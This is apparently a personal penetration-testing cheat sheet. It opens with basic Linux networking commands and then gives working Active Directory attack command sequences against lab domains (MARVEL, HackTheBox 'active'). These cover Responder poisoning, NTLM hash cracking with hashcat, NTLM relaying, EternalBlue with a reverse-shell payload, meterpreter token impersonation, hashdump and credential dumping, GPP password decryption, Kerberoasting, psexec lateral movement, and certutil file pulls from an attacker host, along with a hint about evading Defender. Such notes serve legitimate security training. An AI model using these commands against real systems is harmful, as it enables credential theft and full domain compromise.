Commands

ifconfig
iwconfig

# ping runs indefinitely by default; -c limits the number of probes sent
$ ping -c 1 192.168.1.254
#         ^ ping with count of 1

$ arp -a
_gateway (10.0.2.2) at 52:54:00:12:35:02 [ether] on eth0
#       -a     Use alternate BSD style output format (with no fixed columns).

$ netstat -ano
#   -a, --all
#       Show  both  listening  and  non-listening sockets.  With the --interfaces option,
#       show interfaces that are not up
#       
#   --numeric, -n
#       Show  numerical  addresses  instead of trying to determine symbolic host, port or
#       user names.
#
#   -o, --timers
#       Include information related to networking timers.

$ route # show / manipulate the IP routing table

# Print the default gateway (router) IP
$ ip route show | grep -i 'default via'| awk '{print $3 }'

$ tr -s ' ' <text.txt | cut -d ' ' -f4
# -s, --squeeze-repeats  replace each input sequence of a repeated character
#                        that is listed in SET1 with a single occurrence
#                        of that character

adduser
locate
updatedb - update the file-name database used by locate
chmod +x
su
apt purge  (apt-get purge) - remove a package together with its config files
eog - image viewer (Eye of GNOME)

$ hash -r
# Before doing a lot of apt-get removes and installs, it's worthwhile to reset bash's
# cached command-path table (hash -r), otherwise bash may keep calling a binary that no longer exists.
# https://stackoverflow.com/questions/16237490/i-screwed-up-the-system-version-of-python-pip-on-ubuntu-12-10

# Linux -- inside a VM this will take much longer
hashcat -m 5600 hash.txt /root/rockyou.txt # -m 5600 = NetNTLMv2 hash mode

# Windows
..\hashcat-4.2.1>hashcat64.exe -m 5600 hash.txt rockyou.txt

python Responder.py -I eth0 -rdw

crackmapexec smb <ip range> -u Administrator -p 'P@$$word!' -d MARVEL

meterpreter > load incognito
meterpreter > list_tokens -u # users
meterpreter > list_tokens -g # group
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token MARVEL\\Administrator
[+] Delegation token available
[+] Successfully impersonated user MARVEL\Administrator
meterpreter > getuid
Server username: MARVEL\Administrator
meterpreter > shell
...
C:\Windows\system32>whoami
marvel\administrator

# run with an existing meterpreter session (here session 1)
msf5 > use post/multi/recon/local_exploit_suggester
msf5 post(post/multi/recon/local_exploit_suggester) > set session 1
msf5 post(post/multi/recon/local_exploit_suggester) > run
...
# enter session
msf5 > sessions 1
# check processes
meterpreter > ps

locate ntlmrelayx.py # ships with impacket
python ntlmrelayx.py -tf target.txt -smb2support


nmap -Pn -p445 --script=smb-vuln-ms17-010 <ip>

msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
meterpreter > sysinfo
meterpreter > hashdump

meterpreter > shell
c:\Users\Administrator>arp -a
c:\Users\Administrator>route print

# check whether the machine is dual-homed: with two NICs it can be used to pivot
# e.g. one interface on 10.10.10.X and another on 10.10.11.X
c:\Users\Administrator>netstat -ano
# Ctrl-C terminates the channel and returns to the meterpreter prompt

meterpreter > load incognito
meterpreter > list_tokens -u

meterpreter > load kiwi # note: this kiwi extension is x64
meterpreter > creds_all
meterpreter > wifi_list

root@kali:~/Security/HackTheBox/active# smbclient -L \\\\10.10.10.100\\
Enter WORKGROUP\root's password: # left blank (just pressed Enter) for anonymous login
Anonymous login successful

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    Replication     Disk      
    SYSVOL          Disk      Logon server share 
    Users           Disk      
SMB1 disabled -- no workgroup available


root@kali:~/Security/HackTheBox/active# smbclient \\\\10.10.10.100\\Replication
Enter WORKGROUP\root's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as GPE.INI (0.4 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as GptTmpl.inf (3.1 KiloBytes/sec) (average 1.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.5 KiloBytes/sec) (average 1.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Registry.pol (9.4 KiloBytes/sec) (average 2.8 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as GPT.INI (0.1 KiloBytes/sec) (average 2.4 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as GptTmpl.inf (12.5 KiloBytes/sec) (average 3.8 KiloBytes/sec)

root@kali:~/Security/HackTheBox/active# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18

root@kali:~/Security/HackTheBox/active# cd /opt/impacket/examples/
root@kali:/opt/impacket/examples# python GetUserSPNs.py active.htb/SVC_TGS -dc-ip 10.10.10.100 -request
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password: # entered GPPstillStandingStrong2k18 (the value recovered with gpp-decrypt above)
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                  
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2018-07-30 13:17:40.656520 



$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$cfe6baaf6d9538cee9ab43897032e0fa$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

# Windows Defender can block this, though there are ways to split files to bypass
# GRAB FILES - HTTP
C:\Users\fcastle>certutil -urlcache -f http://<ip>/secrets.txt secrets.txt

# GRAB FILES - FTP
C:\Users\fcastle>ftp <ip>
ftp> get <file>

msf5 > use windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set rhosts 192.168.202.134
msf5 exploit(windows/smb/psexec) > set smbdomain marvel
msf5 exploit(windows/smb/psexec) > set smbpass Password1
msf5 exploit(windows/smb/psexec) > set smbuser fcastle
msf5 exploit(windows/smb/psexec) > set target 2
msf5 exploit(windows/smb/psexec) > run
...
meterpreter > cd c:\\users
meterpreter > upload /root/files/secrets.txt c:\\secrets.txt
meterpreter > download c:\\secrets.txt secrets.txt
